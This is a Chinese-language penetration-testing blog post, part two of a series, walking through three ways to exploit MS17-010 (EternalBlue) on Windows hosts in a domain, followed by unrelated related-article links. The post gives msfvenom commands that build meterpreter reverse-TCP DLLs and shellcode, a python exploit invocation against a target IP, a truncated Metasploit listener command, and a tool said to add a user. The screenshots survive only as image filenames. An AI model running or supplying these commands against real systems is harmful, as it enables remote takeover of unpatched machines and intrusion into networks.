域渗透|浅谈MS17010多种打法(二)

简介: 域渗透|浅谈MS17010多种打法

利用一

NSA原版MS17-010

记得metasploit开启监听

#metasploit生成dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx64.dll    
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx86.dll

1.检查MS17010

990b07a18396d585be094c0bebfb5b5f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.攻击

def2e475246fb402334724733f706d7e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

a5836f36f9decd3c54723d1c90919da1_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3.漏洞利用

faacdaf57a2ead610bde1fe232cad028_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

39b187f7c6ab17932324e41067dd3183_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

metasploit上线

293ca8804b26a13e5d8aff4d856d4f22_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

利用二

K8哥哥的ksmb.exe

3c42502362b7feaa5d5302acbd607e4b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功添加用户

b4608ca303289d817dd958d0b5b33c44_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

利用三

https://blackwolfsec.cc/2017/05/12/Eternalblue_ms17-010/

需要多次利用才能成功

#生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.18 LPORT=1111 -f raw > shellcode
#利用
python3 ms17-010.py --host 192.168.0.28 --file shellcode

加上--port 445会报错

1.攻击

5c891fa3db586c34089571e959a65309_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.监听后成功上线

#一键启动监听
msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/revers

c2087f8d4f68c799502541f553dda370_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

相关文章
|
安全 网络安全 Windows
域渗透|浅谈MS17010多种打法(一)
域渗透|浅谈MS17010多种打法
484 0
域渗透|浅谈MS17010多种打法(一)
|
人工智能 运维 安全
|
网络协议 大数据 5G
大连接时代到来的十大标志之一:用户、战略与网络基础建设
根据中国互络信息中心近日发布的《中国互联网络发展状况统计报告》显示,截至2016年12月,我国网民规模达7.31亿,2016年共计新增网民4299万人,互联网普及率达到53.2%。在这组数据中,手机网民占比达6.95亿,因为老人与儿童可能不会操作PC,但用手机和平板上网则相对容易。
151 0
大连接时代到来的十大标志之一:用户、战略与网络基础建设
|
安全 数据处理
划重点!GDPR,阿里云的六问六答
5月25日欧盟通用数据保护条例要求GDPR正式生效。对每一家企业来说GDPR是一次非常严格的考核促使企业从管理、技术、运营等多个方面对隐私保护水位线做一次全面复盘加以改善。 GDPR生效之前阿里云已全面按照该要求持续进行数据保护与相关服务改进相关工作已经准备就绪。
4917 0
|
安全 网络安全
《网络安全法》施行展望:谁会是第一个吃螃蟹的人?
本文讲的是《网络安全法》施行展望:谁会是第一个吃螃蟹的人?,经历两年时间的立法过程后,《网络安全法》终于在今天正式生效。
1608 0
知识产权攻击是从哪冒出来的?
本文讲的是知识产权攻击是从哪冒出来的?,如果你的业务就是你的知识产权,你应当开始注意别有用心的人了。
901 0